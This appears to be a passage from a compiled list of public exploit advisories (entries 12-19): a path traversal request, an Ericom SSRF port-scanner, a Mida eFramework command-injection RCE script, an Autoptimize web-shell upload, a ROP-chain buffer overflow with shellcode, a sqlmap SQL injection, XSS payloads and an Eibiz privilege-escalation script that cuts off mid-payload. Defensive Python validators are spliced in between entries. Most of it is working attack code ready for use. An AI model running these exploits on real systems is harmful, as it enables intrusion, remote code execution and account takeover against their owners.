                                  @zeroscience

      Advisory ID: ZSL-2020-5585
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5585.php

      26.07.2020

      --

      $ curl "http://192.168.1.1/dlibrary/null?oldfile=../../WEB-INF/web.xml&library=null"

      $ curl "http://192.168.1.1/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"
      ; for 16-bit app support
      [fonts]
      [extensions]
      [mci extensions]
      [files]
      [Mail]
      MAPI=1
  12. # Exploit Title: Ericom Access Server x64 9.2.0 - Server-Side Request Forgery
      # Date: 2020-08-22
      # Exploit Author: hyp3rlinx
      # Vendor Homepage: www.ericom.com
      # Version: Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0
      # CVE: CVE-2020-24548

      [+] Credits: John Page (aka hyp3rlinx)
      [+] Website: hyp3rlinx.altervista.org
      [+] Source: http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt
      [+] twitter.com/hyp3rlinx
      [+] ISR: ApparitionSec

      [Vendor]
      www.ericom.com

      [Product]
      Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0

      AccessNow is an HTML5 remote desktop gateway that works from any device with an HTML5 compatible browser, including from Chromebooks and locked down devices.
      Ericom Blaze provides remote desktop connectivity from Mac, Windows and Linux devices to applications on office / home PCs and virtual desktops (VDI).

      [Vulnerability Type]
      Server Side Request Forgery

      [CVE Reference]
      CVE-2020-24548

      [Security Issue]
      Ericom Access Server allows attackers to initiate SSRF requests making outbound connections to arbitrary hosts and TCP ports.
      Attackers, who can reach the AccessNow server can target internal systems that are behind firewalls that are typically not accessible.
      This can also be used to target third-party systems from the AccessNow server itself.

      The AccessNow server will return an attacker friendly response, exfiltrating which ports are listening for connections.
      This can bypass Firewall rules and undermine the integrity of other systems and security controls in place.

      E.g. listen using Netcat, Nc64.exe -llvp 25

      A) Ericom Server 192.168.88.152 (defaults port 8080)
      B) Attacker 192.168.88.162
      C) Victim 192.168.1.104

      Using Wireshark we can observe A sends a SYN packet to C (port 25)
      C sends SYN/ACK to A
      A sends ACK to C.
      A sends ACK/FIN to C port 25.

      We will then get an AccessNow server response similar to below.

      ["C","M",["Cannot connect to '192.168.1.104:25'.",true]]

      This message indicates we cannot connect and helpfully informs us of closed vs open ports.

      [Affected Component]
      Ericom Server port 8080 will forward connections to arbitrary Hosts and or Ports which are sent using Web-Socket requests.
      Ericom server then replies with a "Cannot connect to" message if a port is in a closed state.

      [Attack Vectors]
      Remote attackers can abuse the Ericom Access Server to conduct port scans on arbitrary systems.
      This is possible due to a server side request forgery vulnerability and using a remote TCP socket program.

      [Impact Information Disclosure]
      true

      [CVE Impact Other]
      Exfiltration of open ports

      [Exploit/POC]
      import sys,ssl
      import websocket ##pip install websocket-client #Required

      #By hyp3rlinx
      #ApparitionSec
      #========================================================
      #Ericom Access Server v9.2.0 for (AccessNow & Blaze) SSRF
      #========================================================

      # ASCII-art banner; its original line layout was lost in extraction and is kept on one line here.
      BANNER=""" ______ _____ | ____| / ____| | |__ _ __ _ __ ___ _ __| | ___ _ __ ___ | __| | '__| '__/ _ \| '__| | / _ \| '_ ` _ \ | |____| | | | | (_) | | | |___| (_) | | | | | | |______|_| |_| \___/|_| \_____\___/|_| |_| |_| SSRF Exploit """

      def ErrorCom(vs,vp,t,p):
          try:
              ws = websocket.create_connection("wss://"+vs+":"+vp+"/blaze/"+t+":"+p, sslopt={'cert_reqs': ssl.CERT_NONE})
              ws.send("SSRF4U!")
              result = ws.recv()
              #print(result)
              if result.find("Cannot connect to")==-1:
                  print("[+] Port "+p+" is open for business :)")
              else:
                  print("[!] Port " + p+ " is closed :(")
              ws.close()
          except Exception as e:
              print(str(e))

      if __name__=="__main__":
          if len(sys.argv) != 5:
              print(BANNER)
              print("[+] Ericom Access Server v9.2.0 - SSRF Exploit - CVE-2020-24548")
              print("[+] By Hyp3rlinX / ApparitionSec")
              print("[!] Usage: <vuln-server>,<port (usually 8080)>,<target>,<port-to-scan>")
              exit()
          if len(sys.argv[4]) > 5:
              print("[!] Port out of range")
              exit()
          print(BANNER)
          ErrorCom(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])

      [PoC Video URL]
      https://www.youtube.com/watch?v=oDTd-yRxVJ0

      [Network Access]
      Remote

      [Severity]
      Medium

      [Disclosure Timeline]
      Vendor Notification : June 21, 2020
      Received automated reply : June 21, 2020
      Request for status : June 30, 2020
      Vendor "Forwarded all the detail to our R&D and Management team" : June 30, 2020
      Request for status : July 13, 2020
      No vendor response
      Informed vendor advisory: August 11, 2020
      Request for status : August 20, 2020
      No vendor response
      August 22, 2020 : Public Disclosure

      [+] Disclaimer
      The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
      Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
      that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
      is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
      for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
      or exploits by the author or elsewhere. All content (c). hyp3rlinx
13. # Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.9.0
# CVE : CVE-2020-15920

#! /usr/bin/python3
# -*- coding: utf-8 -*-

import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def print_disclaimer():
    print("""
---------------------
Disclaimer:
1) For testing purpose only.
2) Do not attack production environments.
3) Intended for educational purposes only and cannot be used for law violation or personal gain.
4) The author is not responsible for any possible harm caused by this material.
---------------------""")


def print_info():
    print("""
[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920)
[*] Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability (RCE) in PDC/ajaxreq.php

Version\t< 2.9.0\t./CVE-2020-15920 http://192.168.1.60:8090/PDC/ajaxreq.php id
Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php id
""")


def pwn(url, cmd):
    running = """
[*] Target URL: {0}
[*] Command: {1}
"""
    print(running.format(url, cmd))

    # PARAM reaches a shell through the PING diagnostic: "-c 0" ends ping at once
    # and ";" chains the injected command, whose output comes back in the response.
    data = {
        "DIAGNOSIS": "PING",
        "PARAM": "127.0.0.1 -c 0; {0}".format(cmd)
    }
    r = requests.post(url, data=data, verify=False)

    line = "[*]" + "-" * 20 + " Output " + "-" * 20 + "[*]"
    pretty_output = r.text.replace('<br>', '\n')
    print(line + "\n{0}\n".format(pretty_output) + line)


def main():
    print_info()
    print_disclaimer()
    parser = argparse.ArgumentParser()
    parser.add_argument("target", type=str, help="the complete target URL")
    parser.add_argument("cmd", type=str, help="the command you want to run")
    args = parser.parse_args()
    pwn(args.target, args.cmd)


if __name__ == '__main__':
    main()
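The PoC works because the PING diagnostic hands PARAM to a shell: "-c 0" makes ping exit immediately and ";" starts the injected command, whose output is returned in the response. As an added Python example (not part of the advisory and not Mida's code), here is that vulnerable shape next to a hardened handler that validates the target as an IP literal or hostname and builds an argument vector for subprocess without a shell. The function names and the ping flags are assumptions made for the example.

```python
import ipaddress
import re

# RFC 1123 hostname shape: dot-separated labels of letters, digits and hyphens,
# no leading/trailing hyphen, no whitespace and no shell metacharacters at all.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_ping_unsafe(param):
    """Mirror of the vulnerable pattern: the request value is pasted into a command line
    that a shell will parse. Returned as a string rather than executed so the example
    runs offline; the string shows exactly what the shell would see."""
    return "ping -c 4 %s" % param


def validate_ping_target(param):
    """Accept exactly one IP literal or one hostname; reject everything else, which
    covers extra options such as '-c 0', command separators and whitespace."""
    if not isinstance(param, str) or not param or len(param) > 253:
        raise ValueError("bad target")
    try:
        return str(ipaddress.ip_address(param))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(param):
        return param
    raise ValueError("bad target: %r" % param)


def build_ping_safe(param, count=4):
    """Argument vector for subprocess.run(argv, shell=False): no shell parses it, and the
    validated target cannot start with '-' or carry a second command. (Assumed flags.)"""
    target = validate_ping_target(param)
    return ["ping", "-c", str(count), target]


if __name__ == "__main__":
    poc_payload = "127.0.0.1 -c 0; id"          # the PoC's PARAM shape with cmd=id
    print("shell sees :", build_ping_unsafe(poc_payload))
    print("safe argv  :", build_ping_safe("127.0.0.1"))
    try:
        build_ping_safe(poc_payload)
    except ValueError as exc:
        print("rejected   :", exc)
```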
14. # Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)
# Date: 2020-08-24
# Software Link: https://wordpress.org/plugins/autoptimize/
# Author : SunCSR Team
# Version: v2.7.6
# Tested on Ubuntu 18.04 / Kali Linux
# Reference: https://wpvulndb.com/vulnerabilities/10372

Description :
-------------------------------------------------------------------
The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.

[POC]

Step 1 :

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: pwnme
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pwnme.me/wordpress/wp-admin/options-general.php?page=ao_critcss
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------26086940735210916964189813544
Content-Length: 685
Origin: http://pwnme
Connection: close
Cookie: autoptimize_feed=1; wordpress_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7Cc2f54fb4e357d2c591b7e5f53e6adb9531b0de5cc5fbc3cab3185f63917307cd; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7C409cbfa6f750ff5902273e879e79d9f746c038c35228c978ea9cc3525eb12602; wp-settings-time-1=1598516614

-----------------------------404272946439029073744006559647
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/zip

<?php Shell Content Here ! ?>
-----------------------------404272946439029073744006559647
Content-Disposition: form-data; name="action"

ao_ccss_import
-----------------------------404272946439029073744006559647
Content-Disposition: form-data; name="ao_ccss_import_nonce"

f25ca64f22
-----------------------------404272946439029073744006559647--

[Response]

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 27 Aug 2020 08:21:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Access-Control-Allow-Origin: http://pwnme.me
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 53

{"code":"200","msg":"Settings imported successfully"}

Step 2:
Access to http://victim//wordpress/wp-content/uploads/ao_ccss/shell.php

Recommendations:
Update to version 2.7.7

Thank you very much!
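The root cause above is that the import handler trusts the client-supplied filename and Content-Type ("application/zip" on a file called shell.php) instead of the bytes. The following added Python example (not Autoptimize code and not part of the advisory) shows a validator that accepts an import only if it is a genuine, intact zip and every member passes an allowlist, so neither a bare PHP file nor a real zip carrying a .php member gets through. The member extension allowlist and the size limits are assumptions, since the page does not describe what the plugin's archive should contain.

```python
import io
import posixpath
import zipfile

# Assumed import policy for this example: only these member extensions,
# a bounded member count and a bounded uncompressed size.
ALLOWED_EXT = {".json", ".css"}
MAX_MEMBERS = 50
MAX_UNCOMPRESSED = 5 * 1024 * 1024


def member_is_safe(name):
    """Reject directory entries, absolute paths, drive letters, '.'/'..' components
    and any extension outside the allowlist (so no .php can ride inside a real zip)."""
    if not name or name.endswith("/"):
        return False
    if name.startswith(("/", "\\")) or ":" in name:
        return False
    if any(part in ("", ".", "..") for part in name.replace("\\", "/").split("/")):
        return False
    return posixpath.splitext(name)[1].lower() in ALLOWED_EXT


def validate_import_archive(data):
    """Return the member names if `data` is a genuine, intact zip whose members all pass
    member_is_safe; raise ValueError otherwise. The client's Content-Type and filename
    are never consulted; only the bytes are."""
    if not data.startswith(b"PK\x03\x04"):
        raise ValueError("not a zip archive (no local file header at offset 0)")
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            if zf.testzip() is not None:
                raise ValueError("corrupt zip member")
            infos = zf.infolist()
    except zipfile.BadZipFile as exc:
        raise ValueError("not a zip archive: %s" % exc)
    if len(infos) > MAX_MEMBERS:
        raise ValueError("too many members")
    if sum(info.file_size for info in infos) > MAX_UNCOMPRESSED:
        raise ValueError("archive expands beyond the size limit")
    for info in infos:
        if not member_is_safe(info.filename):
            raise ValueError("disallowed member: %r" % info.filename)
    return [info.filename for info in infos]


def make_zip(members):
    """Constructed helper: build an in-memory zip from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample inputs.
PHP_UPLOAD = b"<?php system($_GET['c']); ?>"          # what the PoC sends with a zip Content-Type
GOOD_IMPORT = make_zip({"ccss.json": b"{}", "rules.css": b"a{}"})
ZIP_WITH_PHP = make_zip({"shell.php": b"<?php ?>"})   # a real zip is still not enough
ZIP_TRAVERSAL = make_zip({"../evil.json": b"{}"})

if __name__ == "__main__":
    samples = (("php", PHP_UPLOAD), ("good", GOOD_IMPORT),
               ("zip+php", ZIP_WITH_PHP), ("traversal", ZIP_TRAVERSAL))
    for label, blob in samples:
        try:
            print(label, "accepted:", validate_import_archive(blob))
        except ValueError as exc:
            print(label, "rejected:", exc)
```

Checking the "PK\x03\x04" magic alone would still admit ZIP_WITH_PHP; the per-member allowlist is what closes the hole the advisory describes. The magic check also rejects archives that do not start with a local file header (an empty zip, or one with prefixed data), which is acceptable for a settings import.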
15. # Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC)
# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-08-25
# Vulnerable Software: ASX to MP3 converter
# Version: 3.1.3.7.2010.11.05
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

# Proof of Concept :

# 1.- Run python code: asx_to_mp3_rop_exploit.py
# 2.- Works on DEP enabled for ASX2MP3Converter.exe
# 3.- Open "ASX2MP3Converter.exe"
# 4.- Click on "Load" Button
# 5.- Select generated file "asx_to_mp3_rop_exploit.wax".
# 6.- Click on "Open".
# 7.- Calc.exe runs.

#################################################################################################################################################

#Python "asx_to_mp3_rop_exploit.py" Code:
# Python 2 script: str literals are byte strings, which the struct.pack concatenation below relies on.

import struct

file = 'asx_to_mp3_rop_exploit.wax'

payload = "http://"
payload += "A" * 17417 + struct.pack('<L', 0x10010C8A) + "CCCC"

## msfvenom -a x86 -p windows/exec cmd=calc -b "\x00\x0a\x09" -f python
buf = ""
buf += "\xbe\x4b\xe7\x94\x8c\xdb\xcd\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x30\x31\x72\x13\x03\x72\x13\x83\xea\xb7\x05"
buf += "\x61\x70\xaf\x48\x8a\x89\x2f\x2d\x02\x6c\x1e\x6d\x70"
buf += "\xe4\x30\x5d\xf2\xa8\xbc\x16\x56\x59\x37\x5a\x7f\x6e"
buf += "\xf0\xd1\x59\x41\x01\x49\x99\xc0\x81\x90\xce\x22\xb8"
buf += "\x5a\x03\x22\xfd\x87\xee\x76\x56\xc3\x5d\x67\xd3\x99"
buf += "\x5d\x0c\xaf\x0c\xe6\xf1\x67\x2e\xc7\xa7\xfc\x69\xc7"
buf += "\x46\xd1\x01\x4e\x51\x36\x2f\x18\xea\x8c\xdb\x9b\x3a"
buf += "\xdd\x24\x37\x03\xd2\xd6\x49\x43\xd4\x08\x3c\xbd\x27"
buf += "\xb4\x47\x7a\x5a\x62\xcd\x99\xfc\xe1\x75\x46\xfd\x26"
buf += "\xe3\x0d\xf1\x83\x67\x49\x15\x15\xab\xe1\x21\x9e\x4a"
buf += "\x26\xa0\xe4\x68\xe2\xe9\xbf\x11\xb3\x57\x11\x2d\xa3"
buf += "\x38\xce\x8b\xaf\xd4\x1b\xa6\xed\xb2\xda\x34\x88\xf0"
buf += "\xdd\x46\x93\xa4\xb5\x77\x18\x2b\xc1\x87\xcb\x08\x3d"
buf += "\xc2\x56\x38\xd6\x8b\x02\x79\xbb\x2b\xf9\xbd\xc2\xaf"
buf += "\x08\x3d\x31\xaf\x78\x38\x7d\x77\x90\x30\xee\x12\x96"
buf += "\xe7\x0f\x37\xf5\x66\x9c\xdb\xfa"

## ROP chain: set up the registers for VirtualAlloc() and trigger it with PUSHAD

## Save allocation type (0x1000) in EDX
payload += struct.pack('<L', 0x10047F4D)  # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x11112112)
payload += struct.pack('<L', 0x10029B8C)  # XOR EDX,EDX # RETN
payload += struct.pack('<L', 0x1002D493)  # POP EDX # RETN
payload += struct.pack('<L', 0xEEEEEEEE)
payload += struct.pack('<L', 0x10047F4D)  # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x41414141)

## Save the address of VirtualAlloc() in ESI
payload += struct.pack('<L', 0x1002fade)  # POP EAX # RETN
payload += struct.pack('<L', 0x1004f060)  # ptr to &VirtualAlloc()
payload += struct.pack('<L', 0x1003239f)  # MOV EAX,DWORD PTR DS:[EAX] # RETN
payload += struct.pack('<L', 0x10040754)  # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
payload += struct.pack('<L', 0x41414141)
payload += struct.pack('<L', 0x41414141)

## Save the size of the block in EBX
payload += struct.pack('<L', 0x1004d881)  # XOR EAX,EAX # RETN
payload += struct.pack('<L', 0x1003b34d)  # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d)  # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d)  # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d)  # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d)  # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d)  # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d)  # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d)  # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d)  # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x10034735)  # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN

## Save the address of esp in EBP
payload += struct.pack('<L', 0x10031c6c)  # POP EBP # RETN
payload += struct.pack('<L', 0x10012316)  # ADD ESP,8 # RETN

## Save memory protection code (0x40) in ECX
payload += struct.pack('<L', 0x1002e16c)  # POP ECX # RETN
payload += struct.pack('<L', 0xffffffff)
payload += struct.pack('<L', 0x10031ebe)  # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x10031ebe)  # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x1002a5b7)  # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7)  # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7)  # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7)  # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7)  # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7)  # ADD ECX,ECX # RETN

## Save ROP-NOP in EDI
payload += struct.pack('<L', 0x1002e346)  # POP EDI # RETN
payload += struct.pack('<L', 0x10010C8A)  # RETN

## Set up the EAX register to contain the address of # PUSHAD # RETN and JMP to this address
payload += struct.pack('<L', 0x1002E516)  # POP EAX # RETN
payload += struct.pack('<L', 0xA4E2F275)
payload += struct.pack('<L', 0x1003efe2)  # ADD EAX,5B5D5E5F # RETN
payload += struct.pack('<L', 0x10040ce5)  # PUSH EAX # RETN

payload += "\x90" * 4
payload += struct.pack('<L', 0x1003df73)  # & PUSH ESP # RETN
payload += "\x90" * 20
payload += buf

# Binary mode so no byte of the chain is altered by newline translation on Windows
f = open(file, 'wb')
f.write(payload)
f.close()
16. # Title: Online Shopping Alphaware 1.0 - 'id' SQL Injection
# Exploit Author: Moaaz Taha (0xStorm)
# Date: 2020-08-28
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4

# Description
This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases.

#POC
sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10
17. # Exploit Title: SymphonyCMS 3.0.0 - Persistent Cross-Site Scripting
# Google Dork: "lepton cms"
# Date: 2020-08-28
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Vendor Homepage: https://www.getsymphony.com/
# Software Link: https://www.getsymphony.com/
# Version: 3.0.0
# Tested on: Windows
# CVE : N/A

Description:
Cross-site scripting (XSS) vulnerabilities in Symphony CMS 3.0.0 allow remote attackers to inject arbitrary web script or HTML

To Reproduce:
Steps to reproduce the behavior:
1. Login as member
2. Go to 'Articles'
3. Submit malicious content
4. Anyone (including admin) views the article and the XSS is executed

Expected behavior
When admin or user view content, a pop-up will be displayed

Affected components:
events\event.publish_article.php in Symphony CMS 3.0.0 allows XSS via fields['body'] to appendSubheading

POC:

POST /symphonycms/symphony/publish/articles/new/ HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://target/symphonycms/symphony/publish/articles/new/
Content-Type: multipart/form-data; boundary=---------------------------17679481844164416353626544932
Content-Length: 1111
Origin: http://target
Connection: close
Cookie: PHPSESSID=b21qllug0g7ft80ueo3bn0bgcd;
Upgrade-Insecure-Requests: 1

-----------------------------17679481844164416353626544932
Content-Disposition: form-data; name="xsrf"

vr-i2mWs18DPjVmZ8z2nB-Gb3hdyrb
-----------------------------17679481844164416353626544932
Content-Disposition: form-data; name="MAX_FILE_SIZE"

5242880
-----------------------------17679481844164416353626544932
Content-Disposition: form-data; name="fields[title]"

TEST XSS
-----------------------------17679481844164416353626544932
Content-Disposition: form-data; name="fields[body]"

<script>alert('XSS')</script>
-----------------------------17679481844164416353626544932
Content-Disposition: form-data; name="fields[date]"

08/28/2020 5:55 am
-----------------------------17679481844164416353626544932
Content-Disposition: form-data; name="fields[categories][]"

2
-----------------------------17679481844164416353626544932
Content-Disposition: form-data; name="fields[publish]"

yes
-----------------------------17679481844164416353626544932
Content-Disposition: form-data; name="action[save]"

Create Entry
-----------------------------17679481844164416353626544932--

Desktop (please complete the following information):
OS: Windows 10
Browser: Firefox or Chrome
Application: XAMPP, Burpsuite

Additional context
Tested on: 9.03.50 version
POC at: https://vimeo.com/405740251
18. # Exploit Title: Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting
# Date: 2020-08-07
# Vendor Homepage: https://www.nagios.com/products/nagios-log-server/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-log-server/change-log/
# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
# Author Advisory: https://www.getastra.com/blog/911/stored-xss-vulnerability-nagios-log-server/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 2.1.6 and below
# CVE : CVE-2020-16157

1. Description

Nagios Log Server is a popular Centralized Log Management, Monitoring, and Analysis software that allows organizations to view, sort, and configure logs. Version 2.1.6 of the application was found to be vulnerable to Stored XSS. An attacker (in this case, an authenticated regular user) can use this vulnerability to execute malicious JavaScript aimed to steal cookies, redirect users, perform arbitrary actions on the victim’s (in this case, an admin’s) behalf, log their keystrokes and more.

2. Vulnerability

The "Full Name" and "Username" fields in the /profile page or /admin/users/create page are vulnerable to Stored XSS. Once a payload is saved in one of these fields, navigate to the Alerting page (/alerts), create a new alert and select Email Users as the Notification Method. As the user list is shown, it can be seen that the payload gets executed.

3. Timeline

Vulnerability reported to the Nagios team – July 08, 2020
Nagios Log Server 2.1.7 containing the fix to the vulnerability released – July 28, 2020
19. # Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation
# Date: 2020-08-28
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.eibiz.co.th
# Version: 3.8.0
# Tested on: Windows
# CVE : N/A

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 Remote Privilege Escalation / Account Takeover
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: <=3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called "Digital Signage". Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from an unauthenticated remote privilege escalation
# and account takeover vulnerability that can be triggered by directly calling the
# updateUser object (part of ActionScript object graphs), effectively elevating to
# an administrative role or taking over an existing account by modifying the settings.
#
# Tested on: Windows Server 2016
#            Windows Server 2012 R2
#            Windows Server 2008 R2
#            Apache Flex
#            Apache Tomcat/6.0.14
#            Apache-Coyote/1.1
#            BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5584
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5584.php
#
#
# 26.07.2020
#
#

import requests
import sys
#####|
#### |
### |
#PoC |
## |
# |


class Escalada:
    def __init__(self):
        self.session = "11111111112222222222333333333344"
        self.agent = "DigitalSigner/25.1"
        self.display = "Intruder Alert"
        self.ep = "/messagebroker/amf"
        self.suprole = "Designer"
        self.serialize = None
        self.address = None
        self.usrname = None
        self.passwrd = None
        self.headers = None
        self.cookies = None

    def usage(self):
        if len(sys.argv) < 5:
            print("i-Media Server Digital Signage 3.8.0 Privilege Escalation")
            print("Usage: ./poc.py [ip] [username] [password] [displayname] [role]")
            print("Example: ./poc.py 192.168.1.1 testingus 111111 Backdoor Administrator")
            exit(21)
        else:
            self.address = sys.argv[1]
            self.usrname = sys.argv[2]
            self.passwrd = sys.argv[3]
            self.display = sys.argv[4]
            # Roles known to the application:
            # | Administrator
            # | Designer
            # | Reporter
            # | Approver
            self.suprole = "Administrator" if len(sys.argv) < 6 else sys.argv[5]
            if "http" not in self.address:
                self.address = "http://{}".format(self.address)

    @staticmethod
    def amf_string(value):
        """AMF3 UTF-8 string: a one-byte u29 header ((byte length << 1) | 1) followed by
        the bytes. A single header byte only covers values shorter than 64 bytes,
        which is all the original PoC ever encoded this way."""
        raw = value.encode("utf-8")
        return bytes([len(raw) * 2 + 1]) + raw

    def amf(self):
        self.cookies = {"JSESSIONID": self.session}  # not really needed
        self.headers = {"User-Agent": self.agent,
                        "Accept": "*/*",
                        "Accept-Language": "en-US,en;q=0.5",
                        "Accept-Encoding": "gzip, deflate",
                        "Origin": self.address,
                        "Connection": "close",
                        "Referer": self.address + "/main.swf",
                        "Content-Type": "application/x-amf"}

        # AMF0 envelope carrying a flex.messaging.messages.RemotingMessage whose
        # operation is "updateUser" with a ds.model.User body.
        self.serialize = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E\x75\x6C\x6C"
        self.serialize += b"\x00\x03\x2F\x35\x38\x00\x00\x01\xFE\x0A\x00\x00"
        self.serialize += b"\x00\x01\x11\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
        self.serialize += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67\x2E\x6D\x65"
        self.serialize += b"\x73\x73\x61\x67\x65\x73\x2E\x52\x65\x6D\x6F\x74"
        self.serialize += b"\x69\x6E\x67\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
        self.serialize += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65\x72\x61\x74"
        self.serialize += b"\x69\x6F\x6E\x13\x6D\x65\x73\x73\x61\x67\x65\x49"
        self.serialize += b"\x64\x13\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x09"
        self.serialize += b"\x62\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E\x74\x49"
        self.serialize += b"\x64\x17\x64\x65\x73\x74\x69\x6E\x61\x74\x69\x6F"
